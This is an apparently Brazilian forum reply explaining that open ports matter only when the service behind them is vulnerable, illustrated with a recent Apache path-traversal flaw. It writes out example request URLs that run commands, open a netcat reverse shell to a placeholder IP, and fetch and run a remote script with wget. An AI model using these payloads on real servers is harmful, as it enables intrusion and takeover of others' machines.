
rafael_grether
(usa FreeBSD)
Enviado em 10/11/2021 - 18:35h
Explorar portas abertas não significa que o computador remoto esteja vulnerável.
Tudo vai depender se o serviço que está rodando naquela porta está vulnerável.
"Ah da fazer por Bruteforce"
Bruteforce é uma vulnerabilidade, e tem como bloquear.
Um exemplo recente foi a vulnerabilidade do apache de mês atrás, que permitia a execução de comandos arbitrários no sistema.
Ex:
www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/COMANDO
Com isso, voce poderia até invocar o netcat pra criar um shell reverso pra sua maquina, tipo:
www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/usr/bin/nc <ip> <porta> -e /bin/sh
Ou baixar um script malicioso pra executar na maquina:
www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/usr/local/bin/wget https://IP/arquivo.sh && chmod +x arquivo.sh && /bin/sh arquivo.sh
Essa falha foi explorada ativamente. Olha uma tentativa desses acessos no meu servidor.
A Apache corrigiu, mas muitas maquinas foram danificadas.
Fique atento sempre as falhas relatadas na CVE, para saber quando e descobrir como explorar uma vulnerabilidade.
Descobrir as portas abertas é só o primeiro passo, mas de longe é o mais importante, é só uma pequena etapa.